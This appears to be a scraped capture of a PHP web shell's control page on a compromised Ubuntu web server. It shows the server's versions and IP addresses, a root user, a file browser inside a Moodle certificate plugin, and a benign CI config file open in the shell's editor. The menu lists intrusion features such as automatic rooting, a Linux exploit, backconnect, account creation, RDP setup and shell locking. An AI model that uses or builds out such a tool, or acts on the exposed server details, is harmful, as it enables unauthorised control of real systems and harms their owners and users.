Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
mod /
customcert /
[ HOME SHELL ]
Name
Size
Permission
Action
amd
[ DIR ]
drwxrwxr-x
backup
[ DIR ]
drwxrwxr-x
classes
[ DIR ]
drwxrwxr-x
db
[ DIR ]
drwxrwxr-x
element
[ DIR ]
drwxrwxr-x
includes
[ DIR ]
drwxrwxr-x
lang
[ DIR ]
drwxrwxr-x
mobile
[ DIR ]
drwxrwxr-x
pix
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
yui
[ DIR ]
drwxrwxr-x
.travis.yml
1.16
KB
-rw-rw-r--
CHANGES.md
9.07
KB
-rw-rw-r--
LICENSE.md
34.32
KB
-rw-rw-r--
README.md
1.57
KB
-rw-rw-r--
ajax.php
1.81
KB
-rw-rw-r--
composer.json
199
B
-rw-rw-r--
edit.php
9.37
KB
-rw-rw-r--
edit_element.php
3.86
KB
-rw-rw-r--
index.php
3.91
KB
-rw-rw-r--
lib.php
13.33
KB
-rw-rw-r--
load_template.php
3.86
KB
-rw-rw-r--
manage_templates.php
4.8
KB
-rw-rw-r--
mod_form.php
10.03
KB
-rw-rw-r--
my_certificates.php
3.36
KB
-rw-rw-r--
rearrange.php
5.57
KB
-rw-rw-r--
report.php
1.33
KB
-rw-rw-r--
settings.php
4.59
KB
-rw-rw-r--
styles.css
1.79
KB
-rw-rw-r--
upload_image.php
1.84
KB
-rw-rw-r--
verify_certificate.php
5.2
KB
-rw-rw-r--
version.php
1.36
KB
-rw-rw-r--
view.php
7.57
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php # For javascript behat tests we need sudo sudo: true dist: trusty cache: directories: - $HOME/.composer/cache - $HOME/.npm php: - 7.0 - 7.2 addons: firefox: 47.0.1 postgresql: 9.3 apt: packages: - openjdk-8-jre-headless env: global: - MOODLE_BRANCH=MOODLE_35_STABLE - IGNORE_NAMES=mobile_*.mustache # Mobile mustache has specific syntax, ignore their templates matrix: - DB=pgsql - DB=mysqli before_install: - phpenv config-rm xdebug.ini - nvm install 14.0 - nvm use 14.0 - cd ../.. - composer create-project -n --no-dev --prefer-dist moodlehq/moodle-plugin-ci ci ^3 - export PATH="$(cd ci/bin; pwd):$(cd ci/vendor/bin; pwd):$PATH" install: - moodle-plugin-ci install script: - moodle-plugin-ci phplint # - moodle-plugin-ci phpcpd # subplugins often have similar code and cause "duplicated code" errors # - moodle-plugin-ci phpmd # too much noise from this check, maybe, some day... - moodle-plugin-ci codechecker - moodle-plugin-ci validate - moodle-plugin-ci savepoints - moodle-plugin-ci mustache - moodle-plugin-ci grunt -t stylelint:css -t js - moodle-plugin-ci phpunit - moodle-plugin-ci behat
Close